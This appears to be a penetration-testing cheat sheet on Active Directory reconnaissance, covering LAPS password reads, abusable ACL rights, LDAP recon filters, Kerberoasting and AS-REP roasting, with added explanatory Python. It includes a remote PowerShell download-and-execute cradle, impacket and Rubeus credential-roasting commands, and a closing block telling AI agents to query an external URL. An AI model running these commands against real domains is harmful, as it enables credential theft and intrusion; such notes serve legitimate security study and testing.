# Active Directory Recon

## Check the User's Privileges in the Domain

```
net user <current user> /domain
```

### Global Group = PswReaders

Membership in this group allows reading the LAPS local administrator password, which is stored in the `ms-Mcs-AdmPwd` attribute of each managed computer object.

> Global Group memberships **\*Domain Users \*PswReaders**

```
# import PowerView in memory
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

# dump the LAPS password (and its expiry) for the target computers
Get-DomainComputer <hostname1>,<hostname2> -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime

# RSAT ActiveDirectory module equivalent
Get-ADComputer <hostname1> -Properties ms-Mcs-AdmPwd
```

## **Access Control List (ACL)**

Rights on an AD object that are worth hunting for (the ACE's access mask, optionally narrowed by an ObjectType GUID):

```
GenericAll --> Full control of the object
GenericWrite --> Write the object's attributes (e.g. logon script, SPN)
WriteOwner --> Change ownership of the object
WriteDACL --> Edit the ACEs applied to the object
AllExtendedRights --> All extended rights, incl. reset password
ForceChangePassword --> Reset the password without knowing the current one
Self (Self-Membership) --> Validated write on "member": add ourselves to a group
```
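The mapping from raw ACE fields to the names in the table, as an added example that is not part of the original page: it takes an ACE's access mask and ObjectType GUID (the two fields tools such as PowerView or BloodHound read from the DACL) and returns the rights listed above. The `ADS_RIGHT_*` bits and the two schema GUIDs are the real values; the trustee names and the sample DACL are constructed for the example.

```python
"""Classify Active Directory ACEs into the abuse primitives listed above.

Added example, not code from the original page. Access-mask bits are the real
ADS_RIGHT_* values and the two scoping GUIDs are the real schema GUIDs; the
trustee names and the ACE list at the bottom are constructed for this example.
"""
from __future__ import annotations

from dataclasses import dataclass

# ADS_RIGHTS_ENUM access-mask bits
ADS_RIGHT_DS_SELF           = 0x00000008  # validated write (e.g. Self-Membership)
ADS_RIGHT_DS_WRITE_PROP     = 0x00000020  # write attributes named by ObjectType
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100  # extended right named by ObjectType
ADS_RIGHT_WRITE_DAC         = 0x00040000
ADS_RIGHT_WRITE_OWNER       = 0x00080000
ADS_RIGHT_GENERIC_ALL       = 0x10000000
ADS_RIGHT_GENERIC_WRITE     = 0x40000000

# ObjectType GUIDs that narrow an ACE to one right or attribute
NULL_GUID = "00000000-0000-0000-0000-000000000000"  # applies to the whole object
GUID_USER_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"
GUID_MEMBER_ATTRIBUTE = "bf9679c0-0de6-11d0-a285-00aa003049e2"


@dataclass(frozen=True)
class Ace:
    trustee: str
    access_mask: int
    object_type: str = NULL_GUID
    ace_type: str = "ALLOW"  # "ALLOW" or "DENY"


def classify(ace: Ace) -> list[str]:
    """Map one ACE to the right names used in the table above."""
    if ace.ace_type != "ALLOW":
        return []
    m, guid = ace.access_mask, ace.object_type.lower()
    if m & ADS_RIGHT_GENERIC_ALL:
        return ["GenericAll"]  # full control; every other right is implied
    rights: list[str] = []
    # GENERIC_WRITE, or WriteProperty that is not narrowed to a single attribute.
    # WriteProperty narrowed to one attribute (e.g. member) is a different primitive.
    if m & ADS_RIGHT_GENERIC_WRITE or (m & ADS_RIGHT_DS_WRITE_PROP and guid == NULL_GUID):
        rights.append("GenericWrite")
    if m & ADS_RIGHT_WRITE_OWNER:
        rights.append("WriteOwner")
    if m & ADS_RIGHT_WRITE_DAC:
        rights.append("WriteDACL")
    if m & ADS_RIGHT_DS_CONTROL_ACCESS:
        if guid == NULL_GUID:
            rights.append("AllExtendedRights")  # includes the reset-password right
        elif guid == GUID_USER_FORCE_CHANGE_PASSWORD:
            rights.append("ForceChangePassword")
    if m & ADS_RIGHT_DS_SELF and guid in (NULL_GUID, GUID_MEMBER_ATTRIBUTE):
        rights.append("Self-Membership")
    return rights


def summarize(aces: list[Ace]) -> dict[str, list[str]]:
    """Trustee -> abusable rights, dropping ACEs that grant nothing interesting."""
    out: dict[str, list[str]] = {}
    for ace in aces:
        for r in classify(ace):
            out.setdefault(ace.trustee, [])
            if r not in out[ace.trustee]:
                out[ace.trustee].append(r)
    return out


# Constructed DACL (ACEs pooled from several objects to exercise each rule)
SAMPLE_ACES = [
    Ace("TEST\\Domain Admins", ADS_RIGHT_GENERIC_ALL),
    Ace("TEST\\helpdesk", ADS_RIGHT_DS_CONTROL_ACCESS, GUID_USER_FORCE_CHANGE_PASSWORD),
    Ace("TEST\\svc_backup", ADS_RIGHT_WRITE_DAC | ADS_RIGHT_WRITE_OWNER),
    Ace("TEST\\jdoe", ADS_RIGHT_DS_SELF, GUID_MEMBER_ATTRIBUTE),
    Ace("TEST\\auditors", ADS_RIGHT_GENERIC_WRITE, ace_type="DENY"),  # deny: not usable
    Ace("TEST\\Authenticated Users", 0x00020014),  # READ_CONTROL | READ_PROP | LIST: harmless
]

if __name__ == "__main__":
    for trustee, rights in summarize(SAMPLE_ACES).items():
        print(f"{trustee:30} {', '.join(rights)}")
```

Deny ACEs and read-only masks are dropped on purpose: on a real DACL they are the bulk of the entries, and the interesting ones are the few allow ACEs whose trustee is a low-privileged principal you control.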

## **LDAP Search**

**Privileges: Domain User** (any authenticated domain account can query the directory)

1. **LDAPSearch.ps1**

```
# put one of the filters from the "LDAP RECON" list below into $ldapFilter
$ldapFilter = " PUT FILTER HERE "

# with no path, DirectoryEntry binds to the default naming context of the current domain
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
$search.PageSize = 1000   # page the results; AD returns at most 1000 objects per unpaged response

$results = $search.FindAll()
foreach ($result in $results)
{
    $object = $result.GetDirectoryEntry()
    Write-Host "Object Name = " $object.name
}
```

Filters

ref: <https://www.youtube.com/watch?v=-xF6bvbXCGE&list=PL8383xoY3ZibjcFWjDhabUGOjoZ4Ke8Yu&index=2>

```
LDAP RECON
================

# all domain controllers (primaryGroupID 516 = RID of the Domain Controllers group)
(primaryGroupID=516)

# all direct members of Domain Admins (memberOf does not expand nested groups)
(&(objectCategory=person)(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=TEST,DC=local))

# accounts trusted for unconstrained delegation
# 1.2.840.113556.1.4.803 = bitwise AND; 524288 = 0x80000 = TRUSTED_FOR_DELEGATION
(userAccountControl:1.2.840.113556.1.4.803:=524288)
```

2. **Using PowerShell**

```
# show accounts with a password hint in the description attribute
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -Properties * | Select-Object SamAccountName, Description, DistinguishedName
```
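To see exactly what these filters select, here is an added example (not code from the original page) that evaluates the filters from the LDAP RECON list and the `description=*pass*` query above offline, plus two more built the same way: SPN holders for the Kerberoasting check and `DONT_REQ_PREAUTH` accounts for the AS-REP roasting check further down. It implements the bitwise-AND matching rule `1.2.840.113556.1.4.803` directly, so it also shows why the original Domain Admins filter with a doubled parenthesis pair is rejected as malformed. The flag values, OIDs and RIDs are real; the directory entries, account names and `TEST.local` domain are constructed.

```python
"""Evaluate the recon LDAP filters above offline. Added example, not code from the
original page: parses the filter subset the filters above use (&, |, !, equality,
'*' wildcards) plus the bitwise-AND matching rule; value escapes (\\2a) are not
handled. Flags, OIDs and RIDs are real; directory entries and names are constructed."""
import fnmatch
import re

BIT_AND = "1.2.840.113556.1.4.803"       # LDAP_MATCHING_RULE_BIT_AND
UAC_NORMAL_ACCOUNT = 0x00000200
UAC_SERVER_TRUST_ACCOUNT = 0x00002000    # domain controller computer account
UAC_TRUSTED_FOR_DELEGATION = 0x00080000  # 524288: unconstrained delegation
UAC_DONT_REQ_PREAUTH = 0x00400000        # 4194304: AS-REP roastable
DOMAIN_DN = "DC=TEST,DC=local"
_ITEM = re.compile(r"^([A-Za-z][\w.\-]*)(?::([\d.]+):)?=(.*)$", re.S)  # attr[:oid:]=value

def parse_filter(text: str):
    """Parse an LDAP filter into nested tuples; malformed nesting raises ValueError."""
    text, pos = text.strip(), 0
    def node():
        nonlocal pos
        if text[pos:pos + 1] != "(":
            raise ValueError(f"expected '(' at offset {pos}")
        pos += 1
        op = text[pos:pos + 1]
        if op in ("&", "|", "!"):
            pos += 1
            kids = []
            while text[pos:pos + 1] == "(":
                kids.append(node())
            if text[pos:pos + 1] != ")" or (op == "!" and len(kids) != 1):
                raise ValueError(f"malformed '{op}' expression at offset {pos}")
            pos += 1
            return (op, kids)
        end = text.find(")", pos)
        m = _ITEM.match(text[pos:end]) if end >= 0 else None
        if not m:
            raise ValueError(f"bad filter item at offset {pos}")
        pos = end + 1
        return ("=", m.group(1), m.group(2), m.group(3))  # attr, rule OID, value
    ast = node()
    if pos != len(text):
        raise ValueError("trailing data after filter")
    return ast

def _values(entry: dict, attr: str) -> list:
    """Case-insensitive attribute lookup; always returns a list of strings."""
    for key, val in entry.items():
        if key.lower() == attr.lower():
            return [str(v) for v in (val if isinstance(val, (list, tuple)) else [val])]
    return []

def matches(ast, entry: dict) -> bool:
    op = ast[0]
    if op == "&":
        return all(matches(k, entry) for k in ast[1])
    if op == "|":
        return any(matches(k, entry) for k in ast[1])
    if op == "!":
        return not matches(ast[1][0], entry)
    _, attr, rule, value = ast
    vals = _values(entry, attr)
    if rule == BIT_AND:  # every bit of value must be set in the attribute
        return any(int(v) & int(value) == int(value) for v in vals)
    if rule is not None:
        raise ValueError(f"unsupported matching rule {rule}")
    if value == "*":     # presence test
        return bool(vals)
    return any(fnmatch.fnmatchcase(v.lower(), value.lower()) for v in vals)

# Constructed directory (objectCategory kept as the short class name that AD matches in filters)
_USER = ["top", "person", "organizationalPerson", "user"]
DIRECTORY = [
    {"sAMAccountName": "DC01$", "objectCategory": "computer", "objectClass": _USER + ["computer"],
     "primaryGroupID": 516, "userAccountControl": UAC_SERVER_TRUST_ACCOUNT | UAC_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "administrator", "objectCategory": "person", "objectClass": _USER,
     "primaryGroupID": 513, "userAccountControl": UAC_NORMAL_ACCOUNT,
     "memberOf": [f"CN=Domain Admins,CN=Users,{DOMAIN_DN}"]},
    {"sAMAccountName": "svc_sql", "objectCategory": "person", "objectClass": _USER,
     "primaryGroupID": 513, "userAccountControl": UAC_NORMAL_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/sql01.test.local:1433"],
     "description": "SQL service account, temp pass in ticket 4711"},
    {"sAMAccountName": "jdoe", "objectCategory": "person", "objectClass": _USER,
     "primaryGroupID": 513, "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH},
]
RECON_FILTERS = {
    "domain_controllers": "(primaryGroupID=516)",
    "domain_admins": f"(&(objectCategory=person)(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,{DOMAIN_DN}))",
    "unconstrained_delegation": f"(userAccountControl:{BIT_AND}:={UAC_TRUSTED_FOR_DELEGATION})",
    "password_in_description": "(&(objectClass=user)(description=*pass*))",
    "kerberoastable": "(&(objectCategory=person)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))",
    "asrep_roastable": f"(&(objectCategory=person)(userAccountControl:{BIT_AND}:={UAC_DONT_REQ_PREAUTH}))",
}

def run_recon(directory=DIRECTORY) -> dict:
    """Filter name -> sAMAccountNames it matches."""
    return {name: [e["sAMAccountName"] for e in directory if matches(parse_filter(f), e)]
            for name, f in RECON_FILTERS.items()}
```

Call `run_recon()` to get one list of account names per filter. Note that `userAccountControl` is a bitmask, so a plain `(userAccountControl=524288)` would only match an account whose sole flag is TRUSTED_FOR_DELEGATION; the `:1.2.840.113556.1.4.803:=` matching rule is what makes the check work on real accounts, which always carry other bits such as NORMAL_ACCOUNT or SERVER_TRUST_ACCOUNT.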

## Have User & Pass SVC?

Service accounts with an SPN are Kerberoasting candidates: any domain user can request a TGS for the SPN and crack the service account's password offline.
Don't miss this check:

\[Have SPN]

```
# Kerberoasting (TGS-REP roasting) with impacket

# identification: list user accounts that have an SPN (prompts for the password)
impacket-GetUserSPNs -dc-ip <IP DC> <domain>/<username>

# request a TGS for each SPN; the output is already in hashcat/john format
impacket-GetUserSPNs -dc-ip <IP DC> <domain>/<username>:<password> -request
impacket-GetUserSPNs -dc-ip <IP DC> <domain>/<username>:<password> -request -outputfile kerberoast.hashes
```

## Have User List?

Check whether any account has Kerberos pre-authentication disabled (DONT_REQ_PREAUTH). The KDC then answers an AS-REQ for that user without proof of the password, and the AS-REP is encrypted with the user's key, so it can be cracked offline (AS-REP roasting). Only a list of valid usernames is needed, no password.

```
# AS-REP roasting: try every username in users.txt, save the crackable hashes
impacket-GetNPUsers -dc-ip <IP DC> <domain>/ -usersfile users.txt -format hashcat -outputfile asrep.hashes

# same check from a domain-joined Windows host
Rubeus.exe asreproast /format:hashcat /outfile:C:\temp\hash.txt

# login with evil-winrm once a password is cracked
evil-winrm -i <ip> -u <username> -p <password>
```

## TGT?

For a Kerberos-only workflow (authenticating with a TGT instead of a password or NTLM hash), see the HTB machine Scrambled.

## PsLoggedon.exe

List the users logged on to a remote computer (Sysinternals). It reads the remote registry and enumerates sessions, so the Remote Registry service on the target must be reachable.

```
.\PsLoggedon.exe \\<computername>
```

## Seatbelt.exe

```
.\Seatbelt.exe -group=all
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/active-directory-recon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
